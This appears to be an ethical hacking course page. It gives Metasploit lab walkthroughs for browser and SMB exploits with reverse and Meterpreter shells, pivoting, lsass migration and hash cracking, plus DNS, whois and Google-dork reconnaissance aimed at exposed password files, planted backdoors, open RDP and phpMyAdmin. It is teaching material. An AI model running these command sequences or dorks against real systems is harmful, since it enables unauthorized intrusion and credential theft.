Client Side Exploits using Metasploit

{loadposition adposition4}

Overview

Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromises an ecommerce website and then use that website as a proxy to launch attacks on unsuspecting website visitors. {loadposition adposition5}How many of us have received viruses from a malicious webpage and website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user’s web browser.

The role of the web browser has expanded with the role of the web. Web browsers today are required to do much more than present static text and images, web browsers process ecommerce transactions, interact with databases, launch media players, and transfer files. As such, the web and the web browser, was not designed with security in mind. What this means is that the web browser is an opportune target to focus attacks. 

Client-side Defense

So how do you protect yourself and your browser from a client-side attack? Here is a list of best practices to protect against client side attacks:

  • update and run an antivirus program and antispyware program, 
  • update your operating system and web browsers on a regular basis,
  • update media players (eg. Flash, Quicktime), readers (eg. Acrobat), and add-ons regularly
  • update Java
  • do not visit nefarious websites (eg. sites that deal with pirated music and warez)
  • Do not surf the web as an administrator, by making sure to have User Account Control (UAC) enabled in Vista or Windows 7. Windows XP users can use the program Drop My Rights to achieve the same result: click here to learn more

{loadposition adposition6}Client-side Attack

In the video tutorial below, a client-side exploit is tested against a lab computer running Windows XP Pro and Internet Explorer 6. In order to facilitate the attack, I use Metasploit to launch a webserver and serve a malicious webpage to the visiting IE6 web browser.

Demo steps:

Launch msfconsole, load the exploit and payload, set the options and launch the exploiting webserver and webpage. see the following commands:
1. #msfconsole
2. msf > search browser
3. msf > use windows/browser/ms10_046_shortcut_icon_dllloader
4. msf > show payloads
5. msf > set payload generic/shell_reverse_tcp
6. msf > show options
7. msf > set lhost  <your ip address>
8. msf > set srvhost <your ip address>
9. msf > set srvport 80
10. msf > exploit
11. On your test client (victim computer) browse to your Metasploit server’s IP address using Internet Explorer to launch the client side attack.
12. Once the exploit has finished launching list your sessions:
     msf > sessions -l
13. msf > sessions -i 1
14. you should now have a Windows shell to interact with

{loadposition adposition9}

 

Video Tutorial

 

{loadposition adposition8}

 

Metasploit Pivoting

Overview

Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.

Exploit

In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then using pivoting, exploit another host on the network.

Requirements: The pentest exercise was conducted with the Backtrack5 VMware virtual machine against two hosts running WindowsXP Pro – Service Pack 2.

Exploit steps:

  1. Open a terminal in Backtrack and enter the following commands:
  2. #msfconsole
  3. msf > show exploits
  4. msf > use windows/smb/ms08_067_netapi
  5. msf exploit(ms08_067_netapi) > show payloads
  6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
  7. msf exploit (ms08_067_netapi) > show options
  8. msf exploit (ms08_067_netapi) > set RHOST <1st victim’s ip address>
    RHOST => <ip address>
  9. msf exploit (ms08_067_netapi) > exploit        //if you are successful, you will see a meterpreter prompt
  10. meterpreter >                    //if you see this you have a Meterpreter shell
  11. meterpreter > shell           //this will give you a Windows command prompt/shell
  12. C:\WINDOWS\sytem32> exit             //exit out of the Windows command prompt
  13. meterpreter > getpid                 //note the process id that Meterpreter is using
  14. meterpreter > ps              //list all running process on the victim machine. What process does your PID shows up as? svchost.exe? Look for the process “lsass.exe” , it may show up as PID 700
  15. meterpreter > migrate 700           //migrate Meterpreter to the lsass.exe process
  16. meterpreter > getpid                     //verify your new process ID
  17. ctrl+z                             //Key in ctrl+z to background the Meterpreter session
  18. msf > route add <2nd victim’s ip address> <subnet mask> <session id #>           //route a new attack to victim 2
  19. msf > use windows/smb/ms08_067_netapi
  20. msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  21. msf exploit (ms08_067_netapi) > set RHOST <2nd victim’s ip address>
  22. msf exploit (ms08_067_netapi) > exploit
  23. meterpreter >                           //success!!!!

Now that you have a meterpreter shell the sky is the limit. Run a help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:

meterpreter > help                     //help menu
meterpreter > background         //backgrounds the current session
meterpreter > exit                      //terminate the meterpreter session
meterpreter > quit                      //terminate the meterpreter session
meterpreter > write                    //writes data to a channel
meterpreter > mkdir                  //creates a directory
meterpreter > download            //download a file or directory
meterpreter > upload                //upload a file or directory
meterpreter > search                //search for a file

Video Tutorial

Introduction to Metasploit

Metasploit Overview

The Metasploit Framework, MSF is a framework, a collection of programs and tools for penetration testing networks. Metasploit has a collection of exploits, payloads, libraries and interfaces that can be used to exploit computers. You can find a great description of the architecture here: http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architechture . Metasploit is included in the BackTrack5 Linux distribution that is recommended for this class, but you can also easily download and install it into any flavor of Linux.

Metasploit has a large collection of exploits and payloads and the tools to package and deliver them to a targeted host computer. Metasploit allows you to choose an exploit from its library, choose a payload, configure the target addressing, the target port numbers, and other options, and the framework will package it all together together, and launch it across the network to a targeted system. Metasploit is extremely flexible and can assist in the testing and development of exploits. Written in the Ruby programming language, Metasploit also allows the user to write his own exploits and payloads and include them within the framework. Metasploit is cross platform and can run on Linux, MAC OS, and Windows and has exploits and payloads targeting all three as well.

Meterpreter – One of the more powerful payloads is the Metasploit Interpreter or Meterpreter. Meterpreter allows the user to have command line access to the targeted machine without running a cmd.exe process, it runs completely in memory through the exploited process. There is a great article about Meterpreter and how it works here: About Meterpreter . By running Meterpreter on a compromised machine the user wields an incredible amount of system access and control.

Download – You can download Metasploit here: http://metasploit.com/ and there is a great free reference for learning Metasploit here: http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training.

 

Metasploit Basics

Metasploit has many user interfaces including: msfcli, msfconsole, msfweb (deprecated) and msfgui (new). The main tool for accessing Metasploit is the msfconsole. Msfconsole is a console based interface that provides easy functionality, tab completion, and access to external system commands; it is the most stable Metasploit interface with access to more tools and features than the other interfaces. You can launch the Metasploit msfconsole with the following terminal command:

#msfconsole

Note: depending on the speed of your computer the console may take a minute to initialize and start up completely.

msfconsole

Once Metasploit and the msfconsole has completed starting up, you should see the “msf >” command prompt. For command help, you can type “help” or a “?”. Below is a list of the common msfconsole commands to begin pentesting. The help command provides a list of available commands. The “search” command can search for an exploit, and the entire library of scripts etc., by name. The “show exploits” and “show payloads” command will output a complete list of Metasploit’s library of exploits and payloads.

 

Commands

msf > help
msf > search <search term>
msf > show exploits
msf > use <path to exploit>           //as indicated by the show exploits command
msf exploit(exploit name) >          //the command prompt displays the loaded exploit  
msf exploit(exploit name) > show payloads
msf exploit(exploit name) > set PAYLOAD <path to payload>          //as indicated by the show payloads command
msf exploit(exploit name) > show options

Based on the output of the show options command you will need to input some options. Some of the options will have default settings already configured. RHOST and RPORT stands for remote host (target computer) and remote port and LHOST and LPORT stand for local host (your computer) and local port.

msf exploit(exploit name) > set RHOST <ip address>
msf exploit(exploit name) > set RPORT <port number>
msf exploit(exploit name) > set LHOST <ip address>
msf exploit(exploit name) > set LPORT <port number>
msf exploit(exploit name) > exploit          //launches the exploit

 

Metasploit exercise >

Exploiting Systems with Metasploit

Overview

Metasploit is a framework written in Ruby that makes it easy to run penetration tests on computers and servers. The Metasploit framework has hundreds of common exploits and payloads built right into it and ready to use. In addition to that Metasploit allows the user to add their own exploits and payloads into the framework as well. In the following exercise, I choose an exploit for a known vulnerability and a very powerful payload, which launches a program called Meterpreter on the victimized machine. This exercise is meant as a security test only and should never be run on a system that you do not have complete permission to target in this fashion.

Video Tutorial

In this demonstration, the victim machine is running Windows XP service pack 1 and an older version of Icecast Server (icecast2_win32_2.0.1_setup.exe) for Win32, which has a known vulnerability written into its code. You can find it here: http://downloads.us.xiph.org/releases/icecast/

 

In this part, I run Metasploit against a Windows XP system running a vulnerable server

In this part, I use Meterpreter to run a hashdump and then crack the Windows passwords with John the Ripper

DNS Reconnaissance

Overview

The internet and the web would not function without DNS servers. DNS is an integral part of our experience of the internet. DNS resolves names to ip addresses allowing us to type in www.yahoo.com into the address bar without having to remember the ip address 209.191.122.70 instead. Imagine having to put ip addresses into Internet Explorer to do all your surfing…yuck!

From a security/reconnaissance point of view, DNS can be exploited, and offer a means of discovery of an organization’s public and possibly private servers, services and the corresponding ip address locations. By necessity a domain’s authoritative DNS server will give information regarding the domain’s mail servers and DNS servers. We can resolve domain names, DNS servers, and mail servers to ip addresses using the following tools: nslookup, host, and dig.  A great resource about DNS can be found here: https://webhostinggeeks.com/guides/dns/

Nslookup

By typing in nslookup into a command prompt or Linux terminal shell. You will resolve DNS-to-ip-address queries using whatever DNS server has been configured in your network settings. In the following example I use nslookup to access my locally configured DNS server and resolve the “A” record or address record for “yahoo.com”:

    >nslookup
Default Server:
Address:

    >yahoo.com

 

alt

 Notice: How I put the IP address in the address bar and it successfully resolves to the Yahoo web server
alt

If we want to query mail servers we put in the following commands:

    >set type=mx
>somedomain.com

In the example below nslookup has discovered 3 mail servers 

alt

If we want to query for authoritative DNS servers for a domain we put in the following commands:

    >set type=ns
>somedomain.com

 

In the example below nslookup has discovered 7 authoritative name servers

 alt

DNS Reconnaissance Techniques

Offensive Security, the makers of BackTrack, stress the importance of automating information gathering techniques. They delineate DNS information gathering into 3 main types:

  • Forward lookup brute force – Resolving domain names to ip addresses
  • Reverse lookup brute force – Resolving ip addresses to domain names
  • Zone transfers – Acquiring an entire DNS server zone

In order to learn all of these techniques you can use the “host” command.

Host Command

Forward Lookup brute force

The host command line utility is similar to the dig utility and nslookup, it is used for domain name system lookups.  The following command will attempt to resolve a domain name (i.e. server) to an ip address. In other words if I wanted to know if there is a server at www.somename.com I would type in the following command:

#host <www.somename.com>

This can be called “forward lookup brute force” because I am guessing at server names and trying to resolve ip addresses of potentially available online servers. See my results below resolving the college server’s ip addresses. As you can see I was able to find a few available and unavailable servers by guessing at subdomain names:

 

 alt

 

Reverse Lookup brute force

A reverse lookup is similar to a forward lookup except it attempts to resolve domain names from ip addresses:

#host <ip-address>

 

Zone Transfers

A zone transfer attempts to take advantage of a mis-configured nameserver by pretending to be another nameserver, and requesting all DNS zone information. Notice in the example below, that the nameserver has a dot included after the domain name. A successful zone transfer will reveal all of the information for the DNS zone, including the IP address resolutions for all domains, subdomains, DNS records, and servers within the zone.

 #host -l <domain-attacked> <nameserverofdomain-attacked>

Example:

 #host -l somedomain.com ns.somedomain.com.

 

Using Automation

This process of looking up domain names (servers) can be automated by making a list of commonly used domain prefixes used as subdomain names for servers and saving it as a text file. The following prefix names typically indicate a server or network device on a domain. Add to the list and save it as a text file, “subdomains.txt”:
www
www2
mail
mx
mx1
mx2
smtp
exchange
proxy
router
firewall
fw
ldap
sslvpn
backup
demo
test
admin
web
ns1
ns2
ns3
security
sql
tacacs
netbios
cisco
smb
imap
timbuktu
syslog
forum
public
ftp
blog

Note: BackTrack has a list of typical prefix names located in: /pentest/enumeration/dnsenum/dns.txt
For more information on DNS: http://en.wikipedia.org/wiki/List_of_DNS_record_types

Now that you have a list of typical domain prefixes you might want to automate the IP address resolution for quick searches. Here is a simple Bash script which will loop through the subdomains.txt text file executing host commands on a target domain name. Save it as a “.sh” file (“dnshostscript.sh”), give it executable permissions (chmod 755 dnshostscript), and run it (“./dnshostscript.sh”)  :

#!/bin/bash
for name in $(cat subdomains.txt);do
host $name.somedomain.com | grep “has address” | cut -d” ” -f4
done

 

Here is a sample Python script that will enumerate addresses from a prefix list text file and a target domain name. Instead of using the host command it relies on Pythons built in socket tools to resolve host names to ip addresses:
getsubdomainips.py

Usage: #python getsubdomains.py [file of prefixes] [target domain name]
(eg. #python getsubdomains.py subdomains.txt somedomain.com)

 

Whois Reconnaisance

Overview

The Whois protocol goes back the early days of the Internet. A Whois query is a database search, to a Whois server on TCP port 43, and it is used to resolve contact information about domain names, ip address blocks, and Autonomous System numbers. Information about registered domain name owners and their contact information is stored within a Whois database. Each domain name registrar is required to keep a Whois database with the contact information of the domains they host. There are also centralized Whois database servers maintained through the InterNIC.

Whois searches are typically done from a command line program (Linux/Unix) or a Web browser through publicly available websites that offer the service (Windows). The types of information that can be gathered from a Whois search is:

  • Registrar – The company who registered the domain name
  • Whois server – The URL
  • Nameservers – for the domain name in question
  • Expiration date
  • Registrant name – Who registered the domain
  • Email address
  • Address – Registrant address
  • IP address
  • Technical Contact
  • Telephone Number
  • Fax Number

 

Although domain names are not private many registrars will offer “Whois protection” for an extra annual fee. This protection amounts to having the registrar’s contact information resolve within Whois searches, instead of the registrant’s. Aside from providing a modest level of privacy, hackers can still use a Whois search as a reconnaissance tool to learn more about an organization, its contacts, dns servers and registered ip addresses.

A Whois search can be done from the command line or from a website interface by providing a domain name or an ip address:

        #whois examplebusiness.com

or,
#whois <ip address>

ICANN itself has identified the Whois service as a target of spammers harvesting email addresses (see: http://www.icann.org/en/committees/security/sac023.pdf) and has implemented captcha systems to stop automated Whois information harvesting. Regardless, Whois is a tool that can still reveal information valuable to somebody engaging in organizational reconnaissance.

For more information on Whois: http://en.wikipedia.org/wiki/Whois

Google Hacking

Overview

Reconnaissance is the act of collecting information about an organization or individual that will help to enable a computer or network attack. One of the easiest ways to do reconnaissance on a potential target is to leverage the power of search engines. Search engines can be used to gather information about a target and find potential vulnerabilities in an anonymous and risk free fashion. Google hacking has become the most readily available tool for hacker reconnaissance.

Google Dorks

Google is the most powerful search engine in the world and therefore a tool of choice for many hackers. Hackers have developed clever forms of advanced Google searches or queries that produce targeted and relevant information for an attacker. The searches involve Google search engine operators used in such a way as to reveal interesting information. These types of searches are called Googledorks or just dorks. To use a dork all you have to do is look one up at the GHDB, place it in the Google search field, and hit enter. You can find a list of dorks at the Google Hacking Database at http://johnny.ihackstuff.com/ghdb/. Here are some examples of Google queries and the search operators that can be used.

Google Search Directives

  • site: – by specifying the site you will obtain targeted results that reveal the breadth of a domain including subdomains
    example: site:yahoo.com -site:www.yahoo.com (place that search in Google and you will receive information about various yahoo subdomains)
  • link:<a website> – this search will return all the websites that link to a specified website. This search has the potential to return all related business customers, associates, suppliers etc. example:

    link:www.somewebsite.com

  • intitle:index.of – this search targets Apache webserver directories that have no landing webpage but instead reveal an index of all the files in the directory. Usually information about the version of Apache is revealed as well.

    Lab Example 1: intitle:index.of – Type that search into Google to search for an Apache server with directory indexing turned on and it will reveal an index of open files. You can also or target a specific website (site:) and specific types of text or files. In the second example below a search for “passwd” may reveal a password file from a /etc directory. The minus ftp directive (-ftp) subtracts uncrackable, decoy ftp server results from the output. See the examples below and a screenshot of an actual resulting page that was found:


    intitle:index.of

    intitle:index.of passwd -ftp

    see the resulting passlist.txt file below:


    You could target a specific website by adding the “site:” directive:
    site:<some website> intitle:index.of passwd -ftp

    Lab Example 2: intitle: – Searching for backdoors. When a hacker compromises a system they frequently put a backdoor in for easy utilization at a later time. Often times hackers use well known backdoor exploits that become indexed on Google and easily discovered on the internet. This is an embarrassing situation if you are the server owner and your server has root access posted on the internet for all to find and see. If you find one of these opened backdoors do not access the server, it is illegal to access a server without permission, and you could be blaimed for creating the backdoor in the first place. By searching for known text that will reveal compromised pages, Google can reveal former and currently compromised systems. Even a search for a well known Apache/Php backdoor like “Antichat” revealed 3 open, root access, backdoors to compromised servers. Warning, do not enter compromised systems:

    intitle:”Antichat Shell” “disable functions”

    • error | warning – eror messages or warning messages can reveal valuable information about. programming language configuration and settings, database configurations, paths, usernames etc.
      example: intitle:error , error | warning
    • login | logon – search for login portals or front doors
    • username | userid | employee.ID | “your username is” – search directly for pages that may reveal usernames or possible help pages for recovering them
    • admin | administrator | “admin login” – this search attempts to gather results about administrative login portals or other administrative details
    • password | passcode | “your password is” – another variation that can reveal how passwords may function on a given site if not the passwords themselves
  • site:<a website> admin | password | username – You can use the above searches in conjunction with a “site:” to target a specific site
  • inurl:temp | inurl:tmp |inurl:backup | inurl:bak – this search combined with a site query will return files folders that have “temp” or “bak” in the url. example:
    site:<some website.com> inurl:temp | inurl:bak
  • ext:<file type> – creates a search based on a file type.

    Lab Example 3: ext:rdp – put that search into Google and you will be surprised by the links that are returned.Try clicking on some of the returned links and you will be prompted with a Remote Desktop desktop login screen for various remote desktops and servers. You may find someone logged in and observable! See my test example below, you can see I was presented with a Server 2003 login in Spanish:


    ext:rdp


  • -ext:<file type> – using a site:<somesite.com> search in conjunction with -ext:<some file type> you can remove specific file types from the results of a query (-ext:html, -ext:php, -ext:asp, -ext:htm). For instance if you wanted to see .php or .asp results you would not include those in the query
    example: site:yahoo.com -ext:html -ext:htm -ext:shtml (would not return yahoo html pages)
  • filetype: – this search allows you to specify a specific filetype that you are searching for
  • Lab Example 4: A specified text search between quotation marks. I wanted to see if I could find a webpage interface to a database server. One of the most popular database servers is mySQL and the most popular management web interface to mySQL is phpMyAdmin. I tried a test to see if Google could find a phpMyAdmin webpage with root access. I went to the phpMyAdmin download website and examined their demo pages to help identify text specific to a phpMyAdmin landing page with root access. I believe I found one with a Google search of the following two terms: “open new phpmyadmin window” “Create database”. In the spirit of ethical hacking, after landing on a phpMyAdmin page with seemingly root access  I merely hit the browser back button and did not attempt to create or delete a database. Can you identify other search terms that reveal wide open phpMyAdmin webpages?

Search operators that can be used in Google web searches:

allinanchor:
allintext:
allintitle:         example: allintitle:danscourses photoshop
allinurl:
cache:
define:
filetype:         example: danscourses.com filetype:swf
id:
inanchor:
info:
intext:
intitle:
inurl:
phonebook:
related:
rphonebook:
site:
stocks: